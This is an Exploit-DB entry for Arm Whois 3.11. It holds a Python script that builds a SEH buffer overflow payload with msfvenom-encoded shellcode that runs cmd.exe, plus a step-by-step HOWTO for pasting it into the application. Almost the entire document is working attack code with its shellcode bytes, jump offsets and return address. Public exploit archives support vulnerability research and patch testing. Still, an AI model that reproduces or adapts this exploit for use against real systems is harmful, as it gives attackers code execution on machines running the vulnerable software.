Arm Whois 3.11 - Buffer Overflow (SEH)

EDB-ID:

45796

CVE:

N/A




Platform:

Windows_x86

Date:

2018-11-06


# Exploit Title: Arm Whois 3.11 - Buffer Overflow (SEH)
# Date: 2018-11-05 
# Exploit Author: Yair Rodríguez Aparicio (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit)
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Proffesional Español SP3 x86 (PoC), Windows XP Proffesional English SP3 x86 (fully working)
 
# HOWTO:
# 1.- Run python code : python whois.py
# 2.- Copy content to clipboard, from console or from file - text.txt 
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- CMD is popped. 

#max buffer lenght: 658. Badchars: a lot of. alpha_mixed + "\x89" works fine. 

#msfvenom -p windows/exec CMD=cmd.exe -f py -e x86/alpha_mixed -b "\x89"
#445
buf =  ""
buf += "\x54\x5d\xdb\xd5\xd9\x75\xf4\x59\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
buf += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x6b\x58\x4d\x52"
buf += "\x33\x30\x75\x50\x35\x50\x31\x70\x4c\x49\x68\x65\x56"
buf += "\x51\x39\x50\x70\x64\x4c\x4b\x32\x70\x36\x50\x4e\x6b"
buf += "\x73\x62\x54\x4c\x4e\x6b\x72\x72\x62\x34\x4c\x4b\x54"
buf += "\x32\x54\x68\x34\x4f\x6d\x67\x32\x6a\x77\x56\x46\x51"
buf += "\x49\x6f\x6c\x6c\x47\x4c\x61\x71\x63\x4c\x63\x32\x54"
buf += "\x6c\x61\x30\x59\x51\x7a\x6f\x66\x6d\x35\x51\x4a\x67"
buf += "\x59\x72\x5a\x52\x33\x62\x30\x57\x4c\x4b\x50\x52\x64"
buf += "\x50\x4c\x4b\x52\x6a\x77\x4c\x4c\x4b\x42\x6c\x46\x71"
buf += "\x44\x38\x69\x73\x71\x58\x63\x31\x5a\x71\x73\x61\x4c"
buf += "\x4b\x32\x79\x35\x70\x47\x71\x6b\x63\x4e\x6b\x32\x69"
buf += "\x36\x78\x5a\x43\x45\x6a\x33\x79\x4e\x6b\x64\x74\x6c"
buf += "\x4b\x77\x71\x7a\x76\x35\x61\x4b\x4f\x6e\x4c\x7a\x61"
buf += "\x68\x4f\x64\x4d\x33\x31\x48\x47\x66\x58\x6d\x30\x53"
buf += "\x45\x49\x66\x54\x43\x43\x4d\x58\x78\x65\x6b\x61\x6d"
buf += "\x76\x44\x53\x45\x4d\x34\x50\x58\x4c\x4b\x42\x78\x74"
buf += "\x64\x56\x61\x39\x43\x71\x76\x6c\x4b\x34\x4c\x52\x6b"
buf += "\x4c\x4b\x32\x78\x55\x4c\x75\x51\x68\x53\x6e\x6b\x56"
buf += "\x64\x6e\x6b\x65\x51\x78\x50\x6c\x49\x73\x74\x37\x54"
buf += "\x47\x54\x61\x4b\x53\x6b\x53\x51\x71\x49\x73\x6a\x62"
buf += "\x71\x6b\x4f\x4d\x30\x33\x6f\x43\x6f\x71\x4a\x6c\x4b"
buf += "\x64\x52\x4a\x4b\x4e\x6d\x53\x6d\x31\x7a\x57\x71\x6c"
buf += "\x4d\x4c\x45\x68\x32\x47\x70\x47\x70\x57\x70\x66\x30"
buf += "\x75\x38\x56\x51\x6e\x6b\x70\x6f\x6d\x57\x39\x6f\x49"
buf += "\x45\x6d\x6b\x4a\x50\x4e\x55\x69\x32\x50\x56\x73\x58"
buf += "\x59\x36\x4c\x55\x6f\x4d\x6f\x6d\x6b\x4f\x48\x55\x67"
buf += "\x4c\x45\x56\x63\x4c\x77\x7a\x4f\x70\x59\x6b\x4d\x30"
buf += "\x30\x75\x57\x75\x4f\x4b\x37\x37\x42\x33\x70\x72\x62"
buf += "\x4f\x63\x5a\x75\x50\x50\x53\x39\x6f\x4b\x65\x35\x33"
buf += "\x50\x6d\x53\x54\x46\x4e\x30\x65\x62\x58\x53\x55\x75"
buf += "\x50\x41\x41"

shellcode = buf + "\x41"*(658-len(buf))
EDX_BAD_OVERWRITE = "\x42"*4
EIP = "\xC2\x34\x40"
second_space = "\xe9\x65\xFD\xFF\xFF"+ "\x43"*3
first_space = "\x43"*2 + "\xEB\xF2"

buffer = "\x41\x41" + shellcode + EDX_BAD_OVERWRITE + second_space + first_space + EIP 
print buffer
f = open("text.txt", "w")
f.write(buffer)
f.close()